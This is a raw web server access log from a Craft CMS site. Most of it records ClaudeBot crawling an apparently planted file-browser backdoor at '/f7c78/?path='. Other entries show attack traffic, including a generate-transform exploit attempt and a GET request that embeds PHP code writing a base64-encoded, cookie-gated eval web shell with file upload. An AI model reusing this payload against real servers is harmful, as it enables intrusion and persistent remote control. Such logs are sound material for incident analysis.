216.73.216.46 - - [21/Aug/2025:13:48:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fstorage%2F..%2Fvendor%2Fwebonyx HTTP/2.0" 200 1413 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "6957" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2Fc57df74c%2F..%2Fc1b7baf0 HTTP/2.0" 200 1477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 354 0.004 "7160" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fsabberworm%2F..%2Fmonolog HTTP/2.0" 200 1409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.003 "6989" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F..%2F..%2Fpublic%2Frobots.txt HTTP/2.0" 200 1005 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 126 0.005 "3387" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fphpoption%2F..%2Felvanto HTTP/2.0" 200 1413 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.003 "6978" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules%2F..%2Fvendor%2Fmoneyphp HTTP/2.0" 200 1399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 352 0.004 "6946" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fphpoption%2F..%2Filluminate HTTP/2.0" 200 1469 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.005 "9853" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F..%2Fcpresources%2Fb0ac7de7 HTTP/2.0" 200 1463 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 120 0.003 "7196" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F70f7c%2F.%2F..%2Fcpresources%2Fb0ac7de7 HTTP/2.0" 200 1486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 361 0.004 "7420" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:48:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fyiisoft%2Fyii2-debug%2FLICENSE.md HTTP/2.0" 200 1705 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "4493" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Fcpresources%2Fbeefc24a%2F..%2F92fd50c HTTP/2.0" 200 1527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 363 0.005 "9581" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2Fcpresources%2Fbeefc24a%2F..%2F92fd50c HTTP/2.0" 200 1527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 363 0.004 "9582" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Ff7c78%2F..%2Fcpresources%2F30f2c67a HTTP/2.0" 200 1439 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 123 0.003 "8223" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2Fa4303b5a%2F..%2Ff80c1dcc HTTP/2.0" 200 1500 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 114 0.003 "8173" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2Fcpresources%2F7683ad58%2Fcss HTTP/2.0" 200 1475 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "8059" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fconfig%2F..%2Fpublic%2F92d27eb41b.php HTTP/2.0" 200 19596 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 109 0.004 "28338" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fcomposer%2Fspdx-licenses%2F.. HTTP/2.0" 200 1947 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.003 "28764" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2F.%2Ftwig HTTP/2.0" 200 1365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 93 0.004 "6359" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2F..%2Ftemplates%2F.gitkeep HTTP/2.0" 200 950 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 354 0.004 "3155" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:13:49:26 -0400] "GET /cpresources/a091a247/a091a247/index.php?ARRAY=7o2230223n313735353830323136352p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739383536352q6230653562343134316561376366346262366331633965393433626132333366222p2232223n226363376335646664623236663239663837633733393738383365313763323736222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p2262696r675s70617373223n2231372q35302q35312q36382q37322q38332q3231227q HTTP/2.0" 200 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 630 0.945 "983" "0.945" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F..%2Ftemplates%2F.gitkeep HTTP/2.0" 200 949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.004 "3156" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2F..%2Ftemplates%2F_macros HTTP/2.0" 200 1453 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 115 0.004 "7050" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2Fcpresources%2Fbeefc24a%2F..%2Fbb245e8e HTTP/2.0" 200 1489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 118 0.004 "8240" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:36 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fcebe%2F..%2Felvanto HTTP/2.0" 200 1409 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.003 "6903" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:39 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F30a37%2F..%2Flhhpcl.php HTTP/2.0" 200 37753 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.008 "195710" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2F30a37%2F..%2Flhhpcl.php HTTP/2.0" 200 37751 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 118 0.009 "195709" "0.010" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fphpoption%2F..%2Fpixelandtonic HTTP/2.0" 200 1402 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 110 0.003 "6731" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F5e0f94ef%2F..%2Fcec54a4c HTTP/2.0" 200 1509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.003 "8343" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fsabberworm%2F..%2Filluminate HTTP/2.0" 200 1471 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 108 0.003 "9877" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2F.gnupg%2F..%2Frun%2Fcraft4-newsite-space.php-fpm.sock HTTP/2.0" 200 1140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 98 0.003 "3381" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:49:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2Fcebe%2F..%2Fpixelandtonic HTTP/2.0" 200 1399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 105 0.003 "6656" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2F814f3b07%2F..%2Fd842585c HTTP/2.0" 200 1478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 127 0.004 "7442" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fstorage%2F..%2Fvendor%2Fpsr HTTP/2.0" 200 1545 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.006 "13221" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fassets%2F..%2Fdompdf HTTP/2.0" 200 1403 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.004 "6912" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:09 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fmodules%2F..%2Fvendor%2Fjustinrainbow HTTP/2.0" 200 1415 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.004 "7035" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:12 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F814f3b07%2F..%2Fd842585c HTTP/2.0" 200 1476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.003 "7310" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:15 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F3013a1e4%2F..%2Fd842585c HTTP/2.0" 200 1474 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 124 0.003 "7310" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F..%2Fpublic%2F1bb0f6bdab.php HTTP/2.0" 200 3154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 111 0.004 "15559" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2Fvendor%2Fsabberworm%2F..%2Felvanto HTTP/2.0" 200 1414 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.004 "6993" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fvendor%2F..%2Fvendor%2Fpsy HTTP/2.0" 200 1382 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 101 0.003 "6544" "0.003" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:27 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F.%2F..%2Fvendor%2Fyiisoft HTTP/2.0" 200 1580 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 106 0.003 "13035" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:30 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2Fcpresources%2F6b9f20ee%2F.. HTTP/2.0" 200 2365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.005 "61860" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:50:33 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2Fcpresources%2F6b9f20ee%2F.. HTTP/2.0" 200 2364 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 119 0.009 "61859" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:40 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F70f7c%2F.%2F..%2Fcpresources%2F9599b988 HTTP/2.0" 200 1489 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 125 0.008 "7384" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:42 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2Fe3294a7e%2F..%2F..%2Fdel.php HTTP/2.0" 200 1009 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 363 0.005 "3448" "0.005" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:45 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2Fcpresources%2F.%2F7acb0f10%2Fimages%2F.. HTTP/2.0" 200 1604 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 362 0.005 "12995" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:48 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Fcpresources%2F.%2F7acb0f10%2F..%2Fcf1f9745 HTTP/2.0" 200 1518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.003 "9314" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:51:50 -0400] "GET / HTTP/2.0" 302 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 361 0.570 "0" "0.569" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:51:51 -0400] "GET /shop/products HTTP/2.0" 200 6698 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 372 0.621 "74727" "0.621" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:51 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F30a37%2F..%2Findex.php HTTP/2.0" 200 5389 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.003 "15057" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:51:52 -0400] "GET / HTTP/2.0" 302 0 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 632 0.576 "0" "0.577" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:51:53 -0400] "GET /shop/products HTTP/2.0" 200 6700 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 1051 0.674 "74727" "0.673" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:54 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2F30a37%2F..%2Findex.php HTTP/2.0" 200 5388 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 117 0.004 "15056" "0.004" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:51:55 -0400] "POST /index.php?p=actions/assets/generate-transform HTTP/2.0" 500 174636 "https://test.newsite.space/shop/products" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 874 0.607 "174636" "0.606" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:51:57 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F70f7c%2F.%2F..%2F.%2F3534f HTTP/2.0" 200 1479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 116 0.004 "8235" "0.003" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:51:58 -0400] "GET /index.php?p=admin/dashboard&a=<?=file_put_contents(\x22c057546adf31.php\x22,base64_decode(\x22PD9waHAgZWNobyA0MDk3MjMqMjA7aWYobWQ1KCRfQ09PS0lFWyJkIl0pPT0iXDYxXHgzN1w2MFw2Mlx4MzhcMTQ2XHgzNFw3MFw2N1wxNDNcMTQyXHgzMlwxNDFcNzBceDM0XHgzNlx4MzBcNjdceDM2XDY0XHgzNlx4NjRcMTQxXDYzXDE0MVwxNDRcNjNcNzBcNjdceDM4XDE0NVwxNDMiKXtlY2hvIlx4NmZceDZiIjtldmFsKGJhc2U2NF9kZWNvZGUoJF9SRVFVRVNUWyJpZCJdKSk7aWYoJF9QT1NUWyJcMTY1XDE2MCJdPT0iXDE2NVx4NzAiKXtAY29weSgkX0ZJTEVTWyJceDY2XDE1MVx4NmNceDY1Il1bIlwxNjRcMTU1XHg3MFx4NWZceDZlXHg2MVx4NmRceDY1Il0sJF9GSUxFU1siXDE0Nlx4NjlcMTU0XHg2NSJdWyJcMTU2XDE0MVwxNTVceDY1Il0pO319Pz4K\x22));die();?> HTTP/2.0" 302 0 "-" "PycURL/7.43.0.1 libcurl/7.86.0 OpenSSL/1.1.1 zlib/1.2.11 c-ares/1.18.1 libidn2/2.0.4 librtmp/2.3" "213.176.73.78" 750 0.462 "0" "0.463" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:00 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F.%2F..%2F30a37%2F..%2F.. HTTP/2.0" 200 1754 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.005 "20889" "0.005" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:13:52:03 -0400] "GET /?of=1 HTTP/2.0" 200 4403 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:103.0) Gecko/20100101 Firefox/101.0" "62.164.177.242" 251 0.004 "11057" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:03 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2F..%2F.%2F30a37%2F..%2F.. HTTP/2.0" 200 1753 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 347 0.006 "20890" "0.006" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:52:04 -0400] "GET /index.php?p=admin/dashboard HTTP/2.0" 302 0 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 1074 0.460 "0" "0.459" "test.newsite.space"
213.176.73.78 - - [21/Aug/2025:13:52:05 -0400] "GET /admin/login HTTP/2.0" 200 16969 "https://test.newsite.space/index.php?p=actions/assets/generate-transform" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko/20100101 Firefox/46.0" "213.176.73.78" 1244 0.867 "59172" "0.867" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:13:52:06 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2F.%2Fvendor%2Fgraham-campbell%2F..%2Fyiisoft HTTP/2.0" 200 1590 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 112 0.003 "13331" "0.003" "test.newsite.space"
